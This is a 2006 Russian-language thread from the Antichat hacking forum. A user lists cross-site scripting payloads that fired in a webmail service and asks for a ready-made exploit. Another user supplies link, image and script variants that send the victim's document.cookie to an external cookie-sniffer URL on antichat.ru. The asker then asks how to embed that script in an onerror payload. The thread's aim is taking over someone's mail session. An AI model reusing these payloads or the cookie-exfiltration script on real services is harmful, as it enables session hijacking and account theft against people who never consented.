ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
Перезагрузить страницу Xss's
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Xss's
  #1  
Старый 07.09.2006, 18:49
anti_sec2
Новичок
Регистрация: 18.09.2005
Сообщений: 19
Провел на форуме:
132303

Репутация: 1
По умолчанию Xss's
привет вот ротестил одно мыло хсс тестером
проверил мыло
эти дали алерт


<image src="" onerror=alert(8)>
<image src='' onerror=alert(9)>
<img src="" onerror=alert(10)>
<span sss="alert(21);this.sss=null" style=top:expression(eval(this.sss));></span>
<span sss='alert(22);this.sss=null' style=top:expression(eval(this.sss));></span>
<span sss=alert(23);this.sss=null style=top:expression(eval(this.sss));></span>
<style type="text/css">@import url(vbscript:alert(38));</style>


тепер используя это что мне отправит чтобы внедрить antichat.ru/cgi-bin/s.jpg
плз ес можете дайте готовый сплоит или чо то в этом роде
Последний раз редактировалось anti_sec2; 07.09.2006 в 18:51..
 
Ответить с цитированием

  #2  
Старый 07.09.2006, 22:28
Murt@zaa
Новичок
Регистрация: 27.08.2006
Сообщений: 24
Провел на форуме:
354022

Репутация: 29
Отправить сообщение для Murt@zaa с помощью ICQ
По умолчанию
Ни кто не отвечает? слишком уж изЪеженная эта тема про Xss и на форуме можно найти все что надо .
Главное пользоватся поиском=) А на каком почтовике находится мыло???
 
Ответить с цитированием

  #3  
Старый 08.09.2006, 20:52
anti_sec2
Новичок
Регистрация: 18.09.2005
Сообщений: 19
Провел на форуме:
132303

Репутация: 1
По умолчанию
очен прощу хелп
искал не нащел
 
Ответить с цитированием

  #4  
Старый 08.09.2006, 21:10
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию
эм....

Код:
# Простой вызов по ссылке:
<a href="http://antichat.ru/cgi-bin/s.jpg?it is test">click me</a>
# Вызов как картинки:
<img src="http://antichat.ru/cgi-bin/s.jpg">
# Вызов из скрипта:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
http://antichat.ru/sniff/
__________________
 
Ответить с цитированием

  #5  
Старый 12.09.2006, 21:36
anti_sec2
Новичок
Регистрация: 18.09.2005
Сообщений: 19
Провел на форуме:
132303

Репутация: 1
По умолчанию
ок тепер где надо вставит это :
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
в этом
<img src="" onerror=alert(10)>

thank
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ